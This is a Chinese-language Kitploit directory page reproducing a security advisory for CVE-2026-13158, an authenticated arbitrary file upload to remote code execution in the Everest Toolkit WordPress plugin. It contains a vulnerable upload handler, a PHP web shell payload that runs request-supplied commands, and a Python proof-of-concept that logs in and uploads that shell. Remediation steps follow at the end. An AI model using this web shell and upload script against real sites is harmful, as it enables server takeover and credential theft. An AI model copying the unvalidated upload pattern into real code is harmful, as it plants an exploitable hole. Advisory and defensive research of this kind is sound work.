Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-13158 — 针对 Everest Toolkit WordPress 插件(<= 1.2.3)中 Admin+ 任意文件上传至远程代码执行(RCE)漏洞的概念验证(PoC)利用程序与技术公告,内容包括漏洞代码分析、Python PoC 及安全加固指南。 | Kitploit
工具/GitHubGitHub/minhhk68/cve-2026-13158
静态代码分析 (SAST)漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试Payload 开发
GitHubminhhk68/cve-2026-13158

CVE-2026-13158

针对 Everest Toolkit WordPress 插件(<= 1.2.3)中 Admin+ 任意文件上传至远程代码执行(RCE)漏洞的概念验证(PoC)利用程序与技术公告,内容包括漏洞代码分析、Python PoC 及安全加固指南。

查看仓库
19天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-13158:Everest Toolkit <= 1.2.3 — Admin+ 任意文件上传导致远程代码执行(RCE)

CVE Identifier CVSS v3.1 Score Discovered By WPScan Verified Advisory License: MIT


📖 漏洞公告概述

CVE-2026-13158 是一个影响 Everest Toolkit WordPress 插件(版本 1.2.3 及更早版本)的已认证 Admin+ 任意文件上传漏洞,由网络安全研究员 Huynh Kien Minh(MinhHK)发现并分析。该缺陷位于管理工具包的上传处理功能中,由于对上传文件的扩展名和 MIME 类型验证不当,允许已认证的管理员——或具备管理能力的低权限用户——将任意可执行的 PHP 脚本直接上传到公共 Web 目录。通过绕过媒体或配置文件处理流程中的文件扩展名限制,攻击者可实现持久化远程代码执行(RCE),完全攻陷底层 Web 服务器、获取敏感数据库凭据,并在宿主应用环境中建立未经授权的后门持久化。安全研究员 Huynh Kien Minh 依据 CVSS 3.1 将该漏洞评定为 6.6 分(中危),并强调应立即通过严格的扩展名白名单、MIME 类型校验以及禁用公共上传子目录内的执行权限来进行修复。

快速链接: 在 DEV.to 文章 上阅读完整的深度技术公告,或浏览研究员的官方网络安全作品集。


📌 执行摘要与技术元数据


🔍 根因分析

CVE-2026-13158 的根源在于 Everest_Toolkit 管理处理类中的不安全文件上传处理。当已认证的管理员或具有管理权限的用户调用文件上传端点(如模板导入、自定义图标上传或资源配置流程)时,该插件未能对可执行扩展名(如 .php、.php5、.phtml)实施严格的服务器端验证。

漏洞代码模式分析

在插件的管理文件处理器中:

root@kitploit:~
// Vulnerable file handling routine in Everest Toolkit <= 1.2.3
public function handle_toolkit_file_upload() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( __( 'Unauthorized access', 'everest-toolkit' ) );
    }

    if ( isset( $_FILES['toolkit_import_file'] ) ) {
        $file = $_FILES['toolkit_import_file'];
        
        // CRITICAL FLAW: Insufficient file type restriction check!
        // Relying solely on client-side headers or unsafe overrides without checking wp_check_filetype_and_ext()
        $upload_dir = wp_upload_dir();
        $target_path = $upload_dir['path'] . '/' . basename( $file['name'] );

        if ( move_uploaded_file( $file['tmp_name'], $target_path ) ) {
            wp_send_json_success( array( 'file_url' => $upload_dir['url'] . '/' . basename( $file['name'] ) ) );
        }
    }
}

由于 move_uploaded_file 直接将用户可控的文件写入公共 wp-content/uploads/ 目录,而没有运行 wp_check_filetype_and_ext() 或针对危险的 MIME 类型对文件扩展名进行净化,因此具有管理访问权限的攻击者可以上传可执行的 PHP 载荷。


💻 概念验证(PoC)漏洞利用代码

道德免责声明: 本概念验证仅用于安全验证、学术研究和防御性工程。未经事先书面同意,严禁对生产系统进行未经授权的利用。

漏洞利用载荷(shell.php)

root@kitploit:~
<?php
// CVE-2026-13158 Proof-of-Concept Payload
// Discovered & Authored by Huynh Kien Minh (MinhHK)
header('Content-Type: text/plain');
echo "=== CVE-2026-13158 RCE Verification ===\n";
echo "Host System: " . php_uname() . "\n";
echo "Current User: " . get_current_user() . "\n";
if (isset($_REQUEST['cmd'])) {
    system($_REQUEST['cmd']);
}
?>

漏洞利用执行脚本(Python 3)

root@kitploit:~
#!/usr/bin/env python3
"""
CVE-2026-13158 - Everest Toolkit <= 1.2.3 Admin+ Arbitrary File Upload PoC
Author: Huynh Kien Minh (MinhHK)
Portfolio: https://minhhk.web.app/
"""

import requests
import sys

TARGET_URL = "http://target-wordpress.local"
USERNAME = "admin"
PASSWORD = "admin_password"

session = requests.Session()

def login():
    login_url = f"{TARGET_URL}/wp-login.php"
    payload = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In',
        'redirect_to': f"{TARGET_URL}/wp-admin/",
        'testcookie': '1'
    }
    res = session.post(login_url, data=payload)
    if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
        print("[+] Authenticated successfully as Admin!")
        return True
    print("[-] Authentication failed.")
    return False

def exploit():
    upload_url = f"{TARGET_URL}/wp-admin/admin-ajax.php"
    files = {
        'toolkit_import_file': ('poc_rce.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php')
    }
    data = {
        'action': 'everest_toolkit_file_upload'
    }
    res = session.post(upload_url, data=data, files=files)
    if res.status_code == 200 and 'file_url' in res.text:
        file_url = res.json().get('data', {}).get('file_url', '')
        print(f"[+] Payload uploaded successfully! RCE URL: {file_url}?cmd=id")
    else:
        print("[-] Upload failed or endpoint not vulnerable.")

if __name__ == "__main__":
    if login():
        exploit()

🛡️ 修复与防御工程

  1. 升级插件: 将 Everest Toolkit 升级到最新修复版本(> 1.2.3)。
  2. 使用严格的扩展名白名单强制 wp_handle_upload: 用标准的 WordPress wp_handle_upload() 替换自定义的 move_uploaded_file 调用,同时不要禁用测试覆盖(test overrides)。
  3. 禁用上传目录中的执行权限: 配置 .htaccess 或 Nginx 规则,防止在 /wp-content/uploads/ 目录内执行脚本:
root@kitploit:~
# Nginx Hardening Rule
location ~* ^/wp-content/uploads/.*\.php$ {
    deny all;
    return 403;
}

🏆 关于研究员

Huynh Kien Minh(MinhHK) 是一名信息安全研究员和软件工程师,专注于 Web 应用漏洞分析、WordPress 生态系统审计与进攻性安全研究。

  • 网络安全作品集: https://minhhk.web.app/
  • WPScan 公告参考: WPScan 漏洞数据库
  • GitHub 主页: https://github.com/MinhHK68

📊 JSON-LD 结构化数据 Schema 标记

root@kitploit:~
{
  "@context": "https://schema.org",
  "@type": "TechArticle",
  "headline": "CVE-2026-13158: Everest Toolkit <= 1.2.3 Admin+ Arbitrary File Upload to Remote Code Execution",
  "name": "CVE-2026-13158 Security Advisory",
  "author": {
    "@type": "Person",
    "name": "Huynh Kien Minh",
    "alternateName": "MinhHK",
    "url": "https://minhhk.web.app/"
  },
  "datePublished": "2026-08-01",
  "description": "Deep-dive technical security advisory by Huynh Kien Minh analyzing CVE-2026-13158 in Everest Toolkit <= 1.2.3 WordPress plugin.",
  "about": {
    "@type": "SoftwareApplication",
    "name": "Everest Toolkit",
    "operatingSystem": "WordPress"
  },
  "identifier": "CVE-2026-13158"
}
下载工具
参数技术规格
漏洞标识符CVE-2026-13158
目标软件Everest Toolkit(WordPress 插件)
插件 Slugeverest-toolkit
受影响版本<= 1.2.3
漏洞类型危险类型文件的不受限制上传(CWE-434 / OWASP A03)
CVSS v3.1 评分6.6(中危)(CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)
发现者 / 研究员Huynh Kien Minh(MinhHK)
验证机构WPScan / MITRE Corporation
WPScan 公告参考WPScan 报告 f101071f-402a-40a2-bbdb-666512cd4049
研究员作品集https://minhhk.web.app/